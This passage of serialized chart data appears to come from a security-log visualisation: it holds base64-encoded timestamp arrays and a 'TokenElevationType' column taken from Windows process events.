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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1010]},\"TimeGenerated\":{\"__ndarray__\":\"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Yo12QgBQdoFijXZCADCZiGKNdkIAEJuIYo12QgAQjYxijXZCAFCOjGKNdkIAsLqRYo12QgAg7ZFijXZCAPD3kWKNdkIAcPmRYo12QgBw+pFijXZCAHAnl2KNdkIAgCiXYo12QgDAVpxijXZCAABYnGKNdkIA0IWhYo12QgAwiaFijXZCAKDupmKNdkIAgPCmYo12QgCwHaxijXZCADAfrGKNdkIAYEyxYo12QgBATrFijXZCAAB6tmKNdkIAEHu2Yo12QgDQprtijXZCAECou2KNdkIAcNTAYo12QgCA1sBijXZCAJAAxmKNdkIA0AHGYo12QgBwL8tijXZCAMAxy2KNdkIAsFzQYo12QgCAXdBijXZCAJCL1WKNdkIAoI3VYo12QgCQudpijXZCAPC92mKNdkIAEKfgYo12QgDwp+BijXZCAMBG6GKNdkIAcEjoYo12QgAAiehijXZCAHDM5GSNdkIA0LRTaI12QgDwJI9qjXZCANAW6mqNdkIAsBfqao12QgAAnMJrjXZCAPD4t2yNdkIA8Pm3bI12QgDQBbhsjXZCALAGuGyNdkIAsAe4bI12QgAwu7tsjXZCAEC8u2yNdkIA8GnAbI12QgAwa8BsjXZCAKAVxmyNdkIAsE7GbI12QgDAWcZsjXZCAJBaxmyNdkIAcFvGbI12QgDgXMZsjXZCACBexmyNdkIAcGDGbI12QgAQYsZsjXZCACBjxmyNdkIAkGTGbI12QgAwZcZsjXZCALBmxmyNdkIAIGjGbI12QgDwaMZsjXZCABBrxmyNdkIA4GvGbI12QgDwbMZsjXZCAEBwxmyNdkIAIO/GbI12QgCQ8MZsjXZCAFAoyWyNdkIAkCnJbI12QgBQmM1sjXZCADCazWyNdkIAUNLPbI12QgBg089sjXZCAKDH0myNdkIAgMnSbI12QgBA9ddsjXZCACD312yNdkIAYPjXbI12QgBw+ddsjXZCANCo3GyNdkIAcNzcbI12QgAQ5txsjXZCAODm3GyNdkIAUOjcbI12QgAQl+FsjXZCACCY4WyNdkIAcEXmbI12QgCwRuZsjXZCALD26myNdkIA0CbrbI12QgBw8O9sjXZCABDy72yNdkIAcK/0bI12QgCwsPRsjXZCAABf+WyNdkIAcGD5bI12QgAwD/5sjXZCAEAQ/myNdkIAkL0CbY12QgAAvwJtjXZCALBrB22NdkIAkG0HbY12QgCQHQxtjXZCAJAeDG2NdkIAYM4QbY12QgCQ/xBtjXZCABCtFW2NdkIA4K0VbY12QgCQWxptjXZCANBcGm2NdkIAMAsfbY12QgBQDx9tjXZCAABMIG2NdkIAEE0gbY12QgAgxSJtjXZCANDGIm2NdkIAMO4obY12QgAwhDFvjXZCANBroHKNdkIAsFmuc412QgAQ03R0jXZCADBUD3aNdkIAULAEd412QgBQsQR3jXZCAAC9BHeNdkIA0L0Ed412QgAQvwR3jXZCACDuCHeNdkIAMO8Id412QgAw3A13jXZCALDdDXeNdkIAUFUQd412QgAQhhB3jXZCAFCQEHeNdkIAUJEQd412QgBgkhB3jXZCADCTEHeNdkIAcJQQd412QgBwnRB3jXZCABCfEHeNdkIA8KAQd412QgAwohB3jXZCAOCjEHeNdkIAsKQQd412QgBgphB3jXZCABCoEHeNdkIAgKkQd412QgCAsxB3jXZCAGC1EHeNdkIAMLYQd412QgCwtxB3jXZCADC7EHeNdkIAIN8Xd412QgAw4Rd3jXZCABDUG3eNdkIAENUbd412QgDwwSB3jXZCANDDIHeNdkIAUPQkd412QgBQ9SR3jXZCADAYLHeNdkIA4Bksd412QgBATS93jXZCAFBPL3eNdkIAgEAzd412QgCQQTN3jXZCAEByN3eNdkIAEKQ3d412QgDQrTd3jXZCALCuN3eNdkIAsK83d412QgBA4Tt3jXZCAFDiO3eNdkIAwD5Ad412QgBwQEB3jXZCAFBxRHeNdkIAIKNEd412QgDw0Uh3jXZCANDTSHeNdkIAcAJNd412QgCwA013jXZCAJAzUXeNdkIAQDVRd412QgDAZVV3jXZCAJBmVXeNdkIAIJhZd412QgCQmVl3jXZCAODJXXeNdkIAMMxdd412QgBw/GF3jXZCAID9YXeNdkIAkC1md412QgBgX2Z3jXZCAPCQaneNdkIAwJFqd412QgDgwm53jXZCAJDEbneNdkIAcPRyd412QgBg+HJ3jXZCAHCld3eNdkIAsKZ3d412QgBwEn13jXZCAOATfXeNdkIAQAWBd412QgDgf+N3jXZCANA8fnmNdkIAAEYOe412QgDQRg57jXZCAHAk7XyNdkIA0B+MR412QgAAByt/jXZCADAMXICNdkIAIGlR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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1010]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%